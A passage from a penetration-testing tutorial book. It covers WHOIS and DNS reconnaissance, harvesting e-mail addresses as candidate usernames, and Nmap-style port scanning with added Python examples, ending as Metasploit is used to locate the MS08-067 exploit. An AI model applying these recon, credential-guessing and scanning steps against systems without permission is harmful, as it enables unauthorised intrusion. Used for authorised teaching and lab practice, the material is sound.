All together Google has become a very powerful reconnaissance tool. In fact,
the book written by Johnny Long and Justin Brown, 'Google Hacking for
Penetration Testers', is considered vital for any pen tester. However, be
careful with overusing Google. The company has long since woken up to the
possibility that its search engine can be used for reconnaissance: bursts of
operator-laden queries from one address quickly trigger a CAPTCHA or a
temporary block.

Using WHOIS
whois is a simple command-line tool available on most Linux distributions
(install the whois package if it is missing). It returns information about the
registration of a domain, not about what is on the website. There is also a
website, Whois.net, that offers similar functionality. In the command line type
the following to run whois against your target.
whois targetwebsite.com

Figure 46. Using WHOIS on Google.com


An example of output is a follows. The target website may be fake, but the
information that follows is not!
Domain Name: TARGETWEBSITE.NET
Registrar: ASCIO TECHNOLOGIES, INC. DANMARK - FILIAL AF
ASCIO TECHNOLOGIES, INC. USA
Whois Server: whois.ascio.com
Referral URL: http://www.ascio.com
Name Server: NS01.ONE.COM
Name Server: NS02.ONE.COM
Status: ok
Updated Date: 03-jun-2015
Creation Date: 03-jul-2011

Expiration Date: 03-jul-2016

The first line just returns the domain name that is registered by the target,
but you would already know that. The second returns the registrar with which
the domain was registered, in this case ASCIO. The two lines containing the
words Name Server list the DNS servers, here run by the hosting company
one.com, that are authoritative for the domain and answer the queries that
translate its names into IP addresses. Status gives the registry status of the
domain, and the three dates describe when the record was last updated, when
the domain was created and when the registration expires. Going further down
in the WHOIS results will reveal details about the registrant and the hosting
company, although many registrars now hide the registrant's name and address
behind a privacy service.

Using Nslookup
Nslookup (or name server lookup) is a handy tool not dissimilar to WHOIS. It
allows users, network administrators, to query the Domain Name System
(DNS) used to resolve a domain name such as www.targetwebsite.com with an
IP address. The tool has a manual that can be viewed with man nslookup. To
query a website just type in:

nslookup targetwebsite.com

Example output is as follows

Non-authoritative answer:
Name: targetwebsite.net
Address: 123.123.123.1

To use nslookup with just an IP address would get the following result

nslookup 123.123.123.1

Example output would look as follows

Non-authoritative answer:
39.212.30.46.in-addr.arpa name = webcluster39.one.com.

You may notice the words non-authoritative answer: this means the answer came
from the cache of the resolver you asked (usually your ISP's or your own
network's DNS server) rather than directly from a name server that is
authoritative for the zone. For an authoritative answer, query one of the
domain's own name servers, for example nslookup targetwebsite.com ns01.one.com.

We can also look at other, more exotic records, such as the MX record for
email. If a domain such as targetwebsite.com has only one mail server, then the
MX record might be mail.targetwebsite.com. With more than one MX record for a
domain, the preference number indicates where email should be sent first: the
sending mail server tries the record with the lowest number first and falls
back to the higher numbers if that host does not respond.

nslookup -querytype=mx bbc.co.uk

In the case of the BBC, there are two MX records

bbc.co.uk mail exchanger = 20 cluster1a.eu.messagelabs.com.
bbc.co.uk mail exchanger = 10 cluster1.eu.messagelabs.com.

so mail is delivered to cluster1 (preference 10) and only to cluster1a
(preference 20) when the first is unavailable. The messagelabs.com names also
tell you that the BBC routes its mail through a third-party filtering service
rather than through its own servers, which is exactly the kind of detail
reconnaissance is after.

theHarvester
theHarvester is a little tool written in Python by Christian Martorella. With it
you can scan the web for email addresses that are related to your target
domain. Most businesses leave at least some connection to the outside world
open, such as FTP, SSH, VPN and webmail, to do their business. This leaves them
vulnerable to username and password guessing, and every harvested email
address is a probable username. You would be surprised by the number of
people who use the same username for every web service they use (me
included). I strongly suggest you use theHarvester on yourself to discover your
own exposure.

To use theHarvester you enter the following command into the terminal

theharvester -d targetwebsite.com -l 300 -b all

Here -d is followed by your target domain, -l limits the number of results
requested from each search engine and with -b all you signal to use all search
engines. The search will include Bing, Google, PGP key servers, Exalead and
LinkedIn. Optionally you can append -f filename to the command, which will
store the results in a file named filename. Adjust the number after the -l flag
to get more results, but the search will take longer.
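What theHarvester does under the hood is not magic: it fetches search-engine result pages and pulls addresses out of them with regular expressions. The following added example (not theHarvester's code, and it queries no search engine) does the same over a few constructed page snippets embedded in the script, so it runs offline. It also undoes the common "[at]" and "[dot]" obfuscation, keeps only addresses at the target domain and its subdomains, and lists the local parts as candidate usernames for the password-guessing scenario described above. The sample pages, the domain targetwebsite.com and every address in them are made up.

```python
"""Harvest e-mail addresses for a target domain from page text, in the spirit
of theHarvester. Added example: not theHarvester's code and no network access;
it runs over constructed sample pages embedded below."""
import re

# Constructed sample "pages", standing in for search-engine result pages.
SAMPLE_PAGES = [
    "Contact <a href='mailto:J.Smith@TargetWebsite.com'>Jane Smith</a> "
    "or press@targetwebsite.com for media enquiries.",
    "Our sysadmin can be reached at bob.jones [at] targetwebsite [dot] com "
    "and (for the evening shift) bob.jones@targetwebsite.com.",
    "Unrelated vendor: support@example.net. Jobs: hr@targetwebsite.com",
]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Common manual obfuscations: "user [at] host [dot] tld" or "user (at) host (dot) tld"
AT_RE = re.compile(r"\s*\[\s*at\s*\]\s*|\s*\(\s*at\s*\)\s*", re.IGNORECASE)
DOT_RE = re.compile(r"\s*\[\s*dot\s*\]\s*|\s*\(\s*dot\s*\)\s*", re.IGNORECASE)


def deobfuscate(text):
    """Turn '[at]' / '[dot]' style obfuscation back into a plain address."""
    return DOT_RE.sub(".", AT_RE.sub("@", text))


def harvest_emails(pages, domain):
    """Return the sorted set of addresses at `domain` (or one of its
    subdomains) found in `pages`, lower-cased so that case variants of the
    same address collapse into one."""
    domain = domain.lower()
    found = set()
    for page in pages:
        for addr in EMAIL_RE.findall(deobfuscate(page)):
            addr = addr.lower()
            host = addr.rsplit("@", 1)[1]
            if host == domain or host.endswith("." + domain):
                found.add(addr)
    return sorted(found)


def usernames(addresses):
    """Local parts of the harvested addresses: candidate usernames for the
    SSH, VPN and webmail services the chapter mentions."""
    return sorted({addr.split("@", 1)[0] for addr in addresses})


if __name__ == "__main__":
    hits = harvest_emails(SAMPLE_PAGES, "targetwebsite.com")
    print("\n".join(hits))
    print("candidate usernames:", ", ".join(usernames(hits)))
```

Note that the address for an unrelated vendor is dropped and that the two spellings of Bob's address end up as a single entry; the subdomain check is what keeps an address at mail.targetwebsite.com while rejecting one at nottargetwebsite.com.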

Figure 47. theharvester targeting a news website

Using Maltego
Maltego is an open source intelligence and forensics tool developed by
Paterva. It uses data mining on information gathered from open sources and
visualizes targets in graphs. For the purpose of this tutorial you will need to
create a free account. Type in maltego in the Terminal and complete your
account details when prompted. After clicking away more prompts you end up
with a blank Maltego canvas as seen in the figure below.

Figure 48. Example of the use of Maltego

In order to use Maltego on a target, expand the Palette bar on your left. Drag a
Domain onto the canvas in the middle. You will see a Domain entity has been
created with paterva.com as its domain. Change this to your target domain by
double-clicking the text. To perform 'transforms', i.e. queries, just right-click
the Domain entity in the canvas and select Run Transforms. You can
immediately select Run All Transforms, but if your target is a large organization
this could take a while. Otherwise select To Website [Quick lookup] or To
DNS Name – MX (mail server) to look up the website address or the mail
servers respectively. Maltego is a very expansive tool and this tutorial just
scratches the surface, but it should give you a map of your target domain.

Conclusion
These five tools conclude the reconnaissance part of this book. In practice the
number of tools used is countless, and all tools described here have numerous
options and flags you can use. Nonetheless, it is counterproductive to get
swamped in information on your target. Use these tools initially in an ad hoc
manner to get an impression of how your target is organized and where it
may be weak. Be sure to document all relevant output. Sometimes I print out
results and go over them with a red pen to mark possible weaknesses. In the
next chapter we will actively scan part of the target system to uncover
vulnerabilities.

EXTRA:
The Net

Figure 49. Using a laptop on a beach circa 1995? ehh, no!


One of the movies that most IT experts will remember is The Net from 1995.
Described as a schlocky, paranoid thriller, Irwin Winkler's film is very much
a product of its time[7]. 1995 was a busy year for the computer industry.
Windows 95 had just been released and with it the modern consumer market for
PCs was born. No OS before had the kind of exposure that Windows 95 had[8].
It brought along Internet Explorer and Microsoft Office, ushering in the
rising popularity of the Internet. IE famously replaced Mosaic and Netscape
Navigator as the web browser of choice[9]. And so along with this wave came
two computer/hacking movies: Hackers, which dealt mostly with the
counter-culture of hacking, and The Net. The latter starred Sandra Bullock as
Angela Bennett, a systems analyst who discovers a backdoor in the latest
firewall software sold by Gregg Microsystems that allows the villains
unfettered access to pretty much every system using it. Quickly the hunt is
on to kill Bennett; the villains are aided by altering her personal digital
history, making her a person of interest for the police. In effect this movie
is as much about identity theft as it is about hacking. Both The Net and
Hackers continued the corporate domination theme started by Tron back in
1982.

Figure 50. The impossible IP


The Net received mixed reviews. Despite the excellent acting of Sandra
Bullock, the movie appears cheaply made. It also overlooks many technical and
practical issues that the creative staff hoped viewers wouldn't notice. Well,
they did! In the case of IPv4 you should know that no number in the
dotted-decimal notation can exceed 255: an IPv4 address is four 8-bit
numbers, each ranging from 0 to 255, 256 values in all. In the world of The
Net they use a special kind of Internet where apparently higher numbers are
possible. Supposedly this led to a huge number of cola geysers from viewers
who spotted the discrepancy. Security also wasn't quite the same back then as
it is now: if you couldn't guess someone's password there was at least always
the override button you could try. Sadly, this button has disappeared from
most keyboards.

Figure 51. Ordering a pizza online. Little has changed
Production of the movie may have been rushed, but it at least depicts the
mid-90s very well. Women in IT were still rather rare, but coming on the
heels of greater exposure of women in other lines of work such as the navy
and the military it at least allowed a woman to play a much stronger role in
the action genre. Sandra Bullock's acting in The Net opened doors for
actresses such as Angelina Jolie, Catherine Zeta-Jones and Hilary Swank to
star in similar movies. However, back in 1995 it was pretty much impossible
to use a PowerBook Duo laptop on the beach, as the screen could not offer the
brightness to outshine the sun, much less go anywhere without a power
cord[10]. I guess they needed an excuse to put Sandra Bullock into a bikini.

Figure 52. Putting the laptop away


As mentioned before, The Net had some good timing. The year before, while
the movie was already in production, Pizza Hut sold the first pizza online,
at a conference[11]. The way Angela Bennett picks her toppings and places her
order does not seem too different from today. The Net is an interesting movie
if you're feeling nostalgic about the year 1995, but do avoid the terrible
sequel The Net 2.0 from 2006.

Chapter 2 Scanning

To scan or not to scan
Now that we have completed our reconnaissance of the target we should have a
rough idea of how their system is laid out. We should also have a list of IP
addresses belonging to the target that we can use to further our
investigation. This phase is no longer passive like the previous phase,
reconnaissance. Instead we will be sending packets to the target system in
the hope of deducing what services they are running. Don't forget: scanning
systems you do not own or have written permission to test is not allowed,
even if everybody else does it! Set up your own lab machines (such as the
Windows XP machine used in the next chapter) and practice on those.

Vulnerable targets
Often those that are new to this field find this phase the most difficult,
not because of the technical details (which are easy) but because they have
not done their homework during the reconnaissance phase and now don't have
any interesting IP addresses. One tip to remedy this is to look at the
headers of spam mail; chances are it was sent by vulnerable systems. A lot of
those systems have been hacked and are now part of a botnet that sends spam
to random e-mail accounts, including yours! Keep in mind, though, that a
machine being compromised by someone else does not make it yours to scan; the
owner's permission still applies.

Ports
Computer systems use ports so that one IP address can offer many services:
each service listens on its own port number and incoming packets are handed
to the service whose port they name. Ports are entirely a digital construct,
similar to a street address: unless an incoming message carries a port number
that some service is listening on, the message is ignored or answered with a
refusal.
Servers that host websites typically leave port 80 (and 443 for HTTPS) open
so people can reach them through their browser. For hacking purposes this
complicates matters, as a lone web port does not leave a direct route of
attack. If in this phase you do not find services open other than port 80,
then I suggest you redo the reconnaissance phase. That said, website hacking
is possible but is a field in its own right and discussed in later chapters.
Below is a table of commonly used ports. However, with 65536 port numbers
(0-65535) possible for TCP and again for UDP, don't assume a system has only
a few services running. The best way to be certain is to scan all ports.

Port Number   Service
20            FTP data transfer
21            FTP control
22            SSH
23            Telnet
25            SMTP
53            DNS (TCP and UDP)
80            HTTP
443           HTTPS
Table 1. Commonly used ports
There are various programs that can be used for scanning: for host discovery
and port scanning, and for vulnerability scanning. We will start by checking
which hosts are alive, then see if the computer at each IP address is running
any known services. The first program is Ping.

Ping
With the Ping command we send ICMP echo request packets to the target
computer or network device. If it is allowed to reply, then we know the
target is alive, though a few other details can also be gleaned. Note that
many firewalls drop ICMP, so no reply does not prove that a host is down.
Both Windows and Linux have the Ping command installed. On Windows only 4
ICMP packets are sent to the target, while on Linux Ping continues to send
packets until you kill the process with Ctrl + C.
Here is what pinging Google looks like on Linux.
root@kali:~# ping google.com
PING google.com (74.125.136.113) 56(84) bytes of data.
64 bytes from ea-in-f113.1e100.net (74.125.136.113): icmp_req=1 ttl=48 time=24.4 ms
64 bytes from ea-in-f113.1e100.net (74.125.136.113): icmp_req=2 ttl=48 time=24.3 ms
64 bytes from ea-in-f113.1e100.net (74.125.136.113): icmp_req=3 ttl=48 time=30.7 ms
^C
--- google.com ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 23.193/25.278/30.734/2.772 ms
We sent 5 packets before we killed Ping. The round trip time for a packet was
about 23-25 ms, which means the target server is relatively close; a
transatlantic round trip can easily add 100 ms or more. ttl=48 is the
Time-To-Live left in the reply when it reached us. Every router that forwards
a packet decrements the TTL by one and discards the packet when it hits zero,
which prevents packets circling the Internet forever. Linux hosts usually
start at 64 (Windows at 128), so a reply arriving with 48 has passed roughly
16 routers.

Figure 53. Pinging Google until Ctrl-C is pressed

Fping
With Fping we can send ICMP echo requests to a whole range of IP addresses
to see which are alive. To do this with ping would just take too long and is
error prone.
Here is what a typical Fping command looks like. IP-address is a placeholder
for the first three octets of your target network, for example 192.168.1.
root@kali:~# fping -a -g IP-address.1 IP-address.254 > livehosts.txt
Now if you check man fping you will see a whole list of possible switches
that you can use as arguments. However, we can keep things simple with Fping
as we are only interested in which systems are alive. The option -a makes
fping print only the addresses that are alive (-u prints the unreachable
ones instead). With the -g option we give a range of IP addresses to check,
either as a start and end address like above or in CIDR notation
(192.168.1.0/24). The > is a shell redirect, not a pipe: it sends the output
to the file livehosts.txt, which is created if it doesn't already exist. In
the example above we let the last octet of the dotted-decimal notation vary
over the values 1 through 254. The values 0 and 255 are normally the network
and broadcast addresses of a /24, so they rarely identify a host. Remember
that fping, like ping, relies on ICMP; hosts behind a firewall that drops
ICMP will be missing from livehosts.txt even though they are up.
Now that we have an idea which IP addresses are live, the next step will be
a more thorough examination of the services run on the target system.

Nmap
Nmap has been called the Swiss army knife of port scanning. It is certainly
the most popular tool to determine if your target is alive and what open
ports it has. There are two transport protocols you can scan on your target.
The first is TCP, which means you will set up (or at least begin) a
connection with whatever open port on your target would accept one. The
second is UDP, which is connectionless: the sender (you) sends packets to the
target without any handshake and so cannot tell whether they arrived. UDP is
often overlooked because it is associated with real-time services such as
Skype and VoIP, but DNS, SNMP, NTP and TFTP also run over UDP, and those can
be attacked too.
TCP connect scan
As stated before, TCP scans rely on a connection being established with your
target. Nmap sends a SYN packet to each port in the range. If a service is
listening on the port it sends back a SYN/ACK packet, which is then answered
with an ACK packet from your side; a closed port answers with RST instead,
and a port that is firewalled off usually answers nothing at all. The SYN,
SYN/ACK, ACK exchange is known as the three-way handshake and is the
beginning of every TCP connection. If Nmap manages to complete this
procedure, then we know that the particular port is open and potentially
vulnerable.
Despite there being GUI-based versions of Nmap (Zenmap) I will only discuss
commands given through the terminal, to achieve better granularity. Below is
our first Nmap scan. IP-address is a placeholder and should be replaced with
your target.
root@kali:~# nmap -sT -p- -Pn IP-address

With the -sT switch we choose a full three-way handshake (a connect scan).
-p- means scan all ports 1-65535; otherwise only the 1000 most common ports
are scanned. -Pn (the older spelling -PN still works) skips Nmap's own host
discovery and scans the address as if it were alive, which is what you want
when the target drops ping.

Figure 54. Nmap -sT scan with no results
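The connect scan above, written out by hand as an added example (this is my code, not code from the book, and not how Nmap is implemented): each probe is a plain connect(), which completes the three-way handshake, so it needs no root privileges and shows what -sT does and why the application behind the port can log it. The same probes double as a TCP "ping" for the fping step earlier: a RST from a closed port proves the host is up even where ICMP is blocked. To run offline it starts a throw-away listener on 127.0.0.1; the port numbers it picks and the one-second timeout are assumptions.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

TIMEOUT = 1.0   # seconds to wait for a SYN/ACK or RST before calling the port filtered (assumption)


def probe(host: str, port: int, timeout: float = TIMEOUT) -> str:
    """Connect-scan one port: 'open', 'closed' or 'filtered'.

    connect() returning means SYN -> SYN/ACK -> ACK completed, i.e. a service
    accepted the connection (open).  ECONNREFUSED means the host answered our
    SYN with RST (closed).  Silence until the timeout is what a dropping
    firewall looks like (filtered).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"           # handshake done; the service sees (and may log) us
        except ConnectionRefusedError:
            return "closed"         # RST came back: host is up, nothing listens here
        except (TimeoutError, socket.timeout, OSError):
            return "filtered"       # no answer at all (or host unreachable)


def scan(host: str, ports, workers: int = 64) -> dict:
    """Probe many ports concurrently; returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p), ports))
    return dict(zip(ports, states))


def open_ports(host: str, ports) -> list:
    return sorted(p for p, state in scan(host, ports).items() if state == "open")


def alive(host: str, ports=(80, 443, 22)) -> bool:
    """TCP 'ping' (what nmap -PS does): an open OR a closed answer proves the
    host exists, because both come from its TCP stack.  Only silence on every
    port leaves us none the wiser."""
    return any(state != "filtered" for state in scan(host, ports).values())


def start_listener():
    """Bind a throw-away service on 127.0.0.1; returns (socket, port).
    Stand-in for the target's real services so the demo runs offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # port 0: the kernel picks a free port
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:         # listener closed: stop
                return

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port() -> int:
    """A port nothing listens on (assumption: nobody grabs it before we probe)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv, live = start_listener()
    dead = unused_port()
    for port in (live, dead):
        print(f"127.0.0.1:{port} {probe('127.0.0.1', port)}")
    print("host alive:", alive("127.0.0.1", [dead]))     # True: the RST proves it
    print("open ports:", open_ports("127.0.0.1", [dead, live]))
    srv.close()
```

Against a real target, replace 127.0.0.1 with the address from livehosts.txt and pass range(1, 65536) to open_ports; the thread pool is what keeps that from taking all day, and the per-port timeout is what makes a firewalled host slow.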
TCP SYN scan
In the test above it took Nmap 107.37 seconds to test all ports of the target
to see if they were running live services. That is with a full three-way
handshake per port. Note that completing the handshake is not necessary to
determine if the port is open: the SYN/ACK already tells us. If we send a RST
instead of the final ACK, the connection is never established, so the
application behind the port never sees it and typically does not log it (a
firewall or IDS watching the wire still sees the SYN, so the scan is quieter,
not invisible). In Nmap this is known as a SYN scan, or half-open scan. With
-sS instead of -sT we tell Nmap to carry out a SYN scan. In fact, SYN is the
default Nmap scan when you run it as root, which is needed because it crafts
raw packets; as an unprivileged user Nmap falls back to -sT.
root@kali:~# nmap -sS -p- -Pn IP-address
The results of the SYN scan should be the same as those of the regular TCP
connect scan, but it should run a lot faster.
UDP scan
A connectionless UDP scan can be carried out with the switch -sU. Note that
we also omit the -p- flag and only scan the 1000 most common ports. This will
speed up our inquiries at the risk of performing an incomplete scan.

root@kali:~# nmap -sU -Pn IP-address

UDP scanning is often overlooked, but it can definitely be a source of
vulnerability for a system. Because there is no handshake, a closed UDP port
is recognized by the ICMP port unreachable message it provokes, while an open
port often stays silent, so Nmap reports many ports as open|filtered. UDP
scanning can take a lot longer than TCP, partly because operating systems
rate-limit those ICMP messages, so be patient.
X-MAS scan
An important scan is the aptly named X-MAS scan. With this scan we send TCP
packets with the FIN, PSH and URG flags all switched on, so the packet is
"lit up like a Christmas tree"; SYN and ACK are switched off. According to
the TCP standard (RFC 793) a closed port that receives any packet without
the RST flag has to respond with a packet containing RST, while an open port
must simply ignore a packet that carries neither SYN, RST nor ACK. So a RST
reply means closed, and silence means open or filtered by a firewall that
dropped the probe; Nmap reports the latter case as open|filtered because it
cannot tell the two apart. Windows, many Cisco devices and several other
stacks don't follow the RFC here and send RST for every port, open or not,
so against those targets an X-MAS scan shows everything as closed.

root@kali:~# nmap -sX -p- -Pn IP-address

Figure 55. A short duration XMAS scan with no results


NULL scan
The opposite of an X-MAS scan is a NULL scan, which sends a packet with every
flag switched off. Again, a closed port sends back a packet with the RST flag
set while an open port should not send back a packet at all, and again
Windows targets answer RST regardless, while Linux and UNIX systems behave as
the RFC says.

root@kali:~# nmap -sN -Pn IP-address

Both X-MAS and NULL scans are well suited to slip past simple stateless
packet filters and access control lists that only look for SYN packets.
Neither uses any aspect of the three-way handshake and neither sets up a
connection; they just establish whether the port is in use. A stateful
firewall, however, drops them, as they do not belong to any connection.
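To make concrete what distinguishes the -sS, -sX and -sN probes described above, here is an added example (my code, not the book's and not Nmap's) that builds the 20-byte TCP header for each probe type, including the pseudo-header checksum a real packet needs, and applies the RFC 793 reply rules to classify a port the way Nmap reports it. Sending such a header requires a raw socket and root, which Nmap takes care of; this only constructs and checks it. The addresses and port numbers are constructed sample values.

```python
import struct

# TCP flag bits, in header order (RFC 793). Nmap's probes are just combinations of these.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

PROBES = {
    "syn":  SYN,                # -sS: the first step of a real handshake
    "xmas": FIN | PSH | URG,    # -sX: "lit up like a Christmas tree", 0x29
    "null": 0,                  # -sN: no flags at all
}


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def checksum(data: bytes) -> int:
    """Internet checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in (end-around carry)
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    # The checksum also covers this IP-layer prefix: src, dst, zero, protocol 6, TCP length.
    return struct.pack("!4s4sBBH", ip_to_bytes(src_ip), ip_to_bytes(dst_ip), 0, 6, tcp_len)


def tcp_header(src_ip: str, dst_ip: str, sport: int, dport: int, flags: int, seq: int = 0) -> bytes:
    """A minimal 20-byte TCP header (no options) with the given flags and a valid checksum."""
    data_offset = 5 << 4                      # header length 5 words; reserved bits zero
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, data_offset, flags,
                      1024, 0, 0)             # window 1024, checksum placeholder, urgent pointer
    csum = checksum(pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def flags_of(header: bytes) -> int:
    return header[13]                         # byte 13 holds the six flag bits


def checksum_ok(header: bytes, src_ip: str, dst_ip: str) -> bool:
    # A correct packet sums (checksum field included) to all ones, whose complement is 0.
    return checksum(pseudo_header(src_ip, dst_ip, len(header)) + header) == 0


def classify(probe: str, reply: str) -> str:
    """Nmap's reading of the target's reply: 'syn-ack', 'rst', 'icmp-unreachable' or 'none'."""
    if reply == "icmp-unreachable":
        return "filtered"                     # a firewall said so explicitly
    if probe == "syn":
        return {"syn-ack": "open", "rst": "closed", "none": "filtered"}[reply]
    # xmas / null (and FIN): RFC 793 says closed -> RST, open -> silence...
    if reply == "rst":
        return "closed"
    if reply == "none":
        return "open|filtered"                # ...but a dropping firewall is silent too
    return "unexpected"                       # e.g. SYN/ACK to a null probe: a non-RFC stack


def windows_reply(probe: str, port_open: bool) -> str:
    """Stacks like Windows answer RST to xmas/null on every port, so every port looks closed."""
    if probe == "syn":
        return "syn-ack" if port_open else "rst"
    return "rst"


if __name__ == "__main__":
    for name, flags in PROBES.items():
        h = tcp_header("10.0.0.1", "10.0.0.2", 40000, 80, flags)
        print(f"{name:5s} flags=0x{flags_of(h):02x} checksum_ok={checksum_ok(h, '10.0.0.1', '10.0.0.2')}")
    print("xmas, no reply  :", classify("xmas", "none"))
    print("xmas vs Windows :", classify("xmas", windows_reply("xmas", port_open=True)))
```

The classify table is the part worth remembering: only a SYN probe can ever say "open" outright, because only it provokes a positive answer (SYN/ACK); the stealthier probes infer openness from silence, which is exactly what a packet-dropping firewall also produces.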

Conclusion
Port scanning is a wonderful topic in penetration testing. Even the most
secure IT systems run at least a number of services if they want to
communicate with the outside world. Nmap has a lot of options (switches) that
are beyond the scope of this book. Examples include -sV, with which you can
identify the service and version behind a port, -O to guess the operating
system, and -T0 to -T5 to set the timing template: slower scans (-T0, -T1)
spread the probes out to stay under the radar of intrusion detection, faster
ones (-T4, -T5) finish quickly but are noisy.

With a list of open ports on the target, and perhaps a rudimentary idea of
what services it runs, a hacker can start directly accessing the target
system by finding either a flaw in such a service or a bad configuration. A
bad configuration could be something as simple as a default username and
password that was never changed.
Now that you have a list of open ports you can use the following commands if
the target is running Secure Shell on port 22 or Telnet on port 23.

root@kali:~# telnet IP-address

root@kali:~# ssh root@IP-address

Perhaps you will strike gold and discover that your target is already
vulnerable to attack! If not, a more rigorous discovery of vulnerabilities
needs to take place.

EXTRA:
Sneakers

This movie from 1992 by director Phil Alden Robinson takes a frank look at
the world of hacking without delving too much into code and software.
Instead, Sneakers deals with the nascent times of phone phreaking but also
covers topics such as social engineering, cryptography and espionage.
Sneakers was released just as the Soviet Union was collapsing and is very
much a product of its time. The cast includes Robert Redford, Dan Aykroyd,
Sidney Poitier and Ben Kingsley.
The story of Sneakers is about Martin Bishop (a.k.a. Martin Brice). He has
been on the run from the authorities for decades after being accused of
hacking several banks in the late 60s, during the time of civil strife. The
character of Bishop feels like a stand-in for Kevin Mitnick, who had already
served one sentence and by 1992 was on the run from the FBI. Bishop runs a
small outfit that attempts to break into banks to test their security. Of
course nobody around knows of his former identity and that he is a wanted
fugitive. Bishop has a crew including characters such as "Whistler", who is
blind and clearly inspired by Joybubbles, the famous phone phreaker.
Bishop and his gang are persuaded to steal a device from a scientist by what
looks to be the NSA in return for immunity from prosecution. But not
everything appears to be what it is.

Sneakers deals with a device invented by a mathematician that can instantly
decrypt pretty much all cryptography. In essence he proved P = NP: any
problem whose solution can be checked quickly can also be solved quickly,
which would make the hard problems behind public-key cryptography easy[i].
Computer scientist Len Adleman worked as a consultant on the movie, but only
on the condition that his wife could meet Robert Redford[ii]. The
mathematician is murdered in a way eerily similar to the death of real-life
hacker Karl Koch. A race against time begins as Martin tries to prevent an
old nemesis from getting his hands on the device.
The most memorable moment of the movie comes when Martin Bishop
deciphers the meaning of the phrase SETEC ASTRONOMY. It means TOO
MANY SECRETS. A long time ago I was involved with a PC game project. I
had to program the network connection and as a joke I created a backdoor.
Whenever the phrase SETEC ASTRONOMY was entered by the user they
would automatically win the game. Check out Sneakers, it’s still a good movie!

Chapter 3 Exploitation
After having discovered possible entry points into our target system the
next phase can begin. With exploitation we attempt to discover actual
weaknesses in the system and exploit them. The go-to place for exploitation
is Metasploit, a framework that bundles ready-made exploits and payloads
that users can deploy against a target system.

Metasploit tutorial
In this chapter the topic of discussion will be the Metasploit framework, a
tool that allows users to execute nearly any kind of attack on a target. I
will forewarn the reader about one issue: frequent use of Metasploit as a
beginning pen tester won't make you a great hacker. Usually I would say that
point-and-click tools are for script kiddies, but the security community has
taken to Metasploit with interest and its influence can't be ignored.

Figure 56. Metasploit start screen


If you are running Kali Linux then Metasploit will already be installed. For
other Linux systems you will have to execute the following commands.
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
chmod +x /path/to/metasploit-latest-linux-x64-installer.run
sudo /path/to/metasploit-latest-linux-x64-installer.run

The installer will prompt you for a port number for its web service; choose
port 3790.
To start Metasploit we first need to start the PostgreSQL database, which
tracks what you do.

root@kali:~# service postgresql start
We also need to create and initialize the msf database with the command
root@kali:~# msfdb init
If you have browsed through all the security tools installed with Kali you
may have noticed there is a GUI version of Metasploit (Armitage). We will be
using msfconsole, the Terminal-based interface. Type in the following command
to start the interface.
root@kali:~# msfconsole
Don't be alarmed if Metasploit takes a while to start; also note that the
text-based graphics can change with every new release of the framework. The
remainder of the startup screen shows you which version of Metasploit you
have and how many exploits and payloads are present. Always make sure you
have a recent version of the Metasploit framework.
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

After the program has started you are dropped at the msf console prompt. In
Metasploit we can search for known vulnerabilities or exploits using the
search command. An example is the well-known security vulnerability
MS08-067, which affects unpatched versions of Windows XP and Windows Server
2003 (and older systems back to Windows 2000). A PC affected by MS08-067 is
vulnerable to remote code execution over SMB (port 445): essentially you can
hijack the operating system. Chances are good that if you scanned an
unpatched Windows XP machine (or one of your own hack lab machines) you found
port 445 open and the machine vulnerable. With Metasploit you can search for
all relevant information regarding a vulnerability and combine an exploit
with a payload to attack a system. First, let's search for ms08-067 with the
search command.
msf > search ms08-067

As you see this returns one known exploit matching that name. It gives a
brief description and rank but little else.
Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

The search matches substrings, so a shorter term casts a wider net: searching
for ms08 alone returns 7 modules, one for each MS08 bulletin Metasploit has
an exploit for. (The wildcard here, if you need one, is the SQL percent sign
%, since the search in this version is backed by the module database; the
star (*) belongs to shell globs and regular expressions, not to search.)
To learn more about a specific exploit we use the info command. Note that we
use the fully qualified name of the module as found by the search command.
msf > info exploit/windows/smb/ms08_067_netapi
What follows is an extended description of the exploit. The section
Available targets lists all operating system versions the exploit has been
tuned for. The section Basic options shows the settings you must fill in
before running it, while Payload information shows how much room there is
for the payload. With Metasploit it is possible to mix and match exploits and
payloads; you can even create your own payload. For ms08_067 we have a
payload space of 410 bytes. The final section describes the vulnerability
briefly.
This module exploits a parsing flaw in the path canonicalization
